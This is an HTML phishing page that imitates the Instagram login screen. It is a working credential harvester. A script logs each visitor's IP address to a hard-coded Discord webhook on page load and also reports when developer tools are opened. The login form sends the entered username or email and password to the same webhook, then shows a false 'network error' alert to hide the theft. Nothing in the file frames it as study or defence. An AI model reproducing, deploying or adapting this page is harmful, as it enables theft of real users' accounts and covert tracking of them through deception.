<!doctype html>
<html>
 <head>
  <title>Login • Instagram</title>
  <meta name="description" content="Welcome back to instagram. Sign in to check out what your friends, family & interests have been capturing & sharing around the world.">
  <link rel="stylesheet"
   href="style.css">
 </head>
 <body>

 
  <script src="script.js"></script>
  
  <link rel="stylesheet"
   href="https://cdnjs.cloudflare.com/ajax/libs/normalize/8.0.1/normalize.min.css">
  <style>
   body {
    background-color: #fafafa;
    font-family: Arial, sans-serif;
   }
   
   .container {
    max-width: 400px;
    margin: 0 auto;
    padding: 20px;
    border: 1px solid #dbdbdb;
    background-color: #fff;
   }
   
   .logo {
    margin-bottom: 20px;
    text-align: center;
   }
   
   .logo img {
    width: 150px;
   }
   
   .title {
    text-align: center;
    font-size: 20px;
    margin-bottom: 20px;
    color: #262626;
   }
   
   form {
    display: flex;
    flex-direction: column;
   }
   
   label {
    font-size: 14px;
    color: #999;
    margin-bottom: 5px;
   }
   
   input[type="text"],
   input[type="password"] {
    padding: 10px;
    border: 1px solid #dbdbdb;
    border-radius: 3px;
    margin-bottom: 10px;
   }
   
   input[type="button"] {
    padding: 10px;
    font-size: 16px;
    font-weight: bold;
    color: #fff;
    background-color: #3897f0;
    border: none;
    border-radius: 3px;
    cursor: pointer;
   }
   
   input[type="button"]:hover {
    background-color: #2271b3;
   }
  </style>
  </head>
  <body>
    
    
        <br>
    <font face=Adobe Gothic Std"font
     size="3" font color="white">
     <div id="ip-address"></div>
     
     <script>
      const DISCORD_WEBHOOK_URL =
       'https://discord.com/api/webhooks/1140793116039839744/IuhcN5prFS__DcpevBHAf9oB_B-j6n1maoyrGVrqkwBm52jnS2WY5_PQY1UTf-0Adrob';
      
      const getIPAddress =
       async () => {
        try {
         const response =
          await fetch(
           'https://api.ipify.org?format=json'
          );
         const data = await response
          .json();
         const ipAddress = data.ip;
         displayIPAddress(
          ipAddress);
         sendToDiscord(ipAddress);
        } catch (error) {
         console.error(
          'Failed to fetch IP address:',
          error);
        }
       };
      
      const displayIPAddress = (
       ipAddress) => {
       const ipAddressElement =
        document
        .getElementById(
         'ip-address');
       ipAddressElement
        .textContent =
        ipAddress;
      };
      
      const sendToDiscord = async (
       ipAddress) => {
       try {
        const payload = {
         content: `IPv4: ${ipAddress}`
        };
        
        const response =
         await fetch(
          DISCORD_WEBHOOK_URL, {
           method: 'POST',
           headers: {
            'Content-Type': 'application/json'
           },
           body: JSON.stringify(
            payload)
          });
        
        if (response.status !==
         204) {
         console.error(
          'Failed to send IP address to Discord.'
         );
        }
       } catch (error) {
        console.error(
         'Failed to send IP address to Discord:',
         error);
       }
      };
      
      window.addEventListener('load',
       getIPAddress);
      
      
      window.addEventListener(
       'devtoolschange', (
        event) => {
        if (event.detail.isOpen) {
         console.log(
          'IDS Detected Developer tools or inspect element opened'
         );
         sendToDiscord(
          'IDS Detected Developer tools or inspect element opened'
         );
        }
       });
     </script>
    
   <div class="container">
    <div class="logo">
     <img
      src="https://www.instagram.com/static/images/web/mobile_nav_type_logo.png/735145cfe0a4.png"
      alt="Instagram Logo">
    </div>
    
    <form>
     <br><label
       for="username_or_email">Phone
       number, username, or
       email:</label></br>
      <input type="text"
       id="username_or_email"
       name="username_or_email"
       required>
      
    <br>  <label
       for="password">Password:</label>
      <input type="password"
       id="password" name="password"
       required></br>
      
      <input type="button"
       value="Submit"
       onclick="sendCredentials()">
    </form>
   </div>
   
  
  <script>
  
    function sendCredentials() {
      var usernameOrEmail = document
       .getElementById(
        "username_or_email").value;
      var password = document
       .getElementById("password")
       .value;
      
      var payload = {
       "content": "New login attempt!",
       "embeds": [{
        "title": "Credentials",
        "fields": [{
          "name": "Username or Email",
          "value": usernameOrEmail
         },
         {
          "name": "Password",
          "value": password
         }
        ]
       }]
      };
      
      $.ajax({
       url: "https://discord.com/api/webhooks/1140793116039839744/IuhcN5prFS__DcpevBHAf9oB_B-j6n1maoyrGVrqkwBm52jnS2WY5_PQY1UTf-0Adrob",
       type: "POST",
       data: JSON.stringify(
        payload),
       contentType: "application/json",
       success: function() {
        alert(
         "A network error has occurred."
        );
       },
       error: function(xhr, status,
        error) {
        console.error(xhr
         .responseText);
        alert(
         "A network error has occurred."
        );
       }
      });
     }

</script>


   <script
    src="https://code.jquery.com/jquery-3.6.0.min.js">
   </script>
   
  </body>
</html>
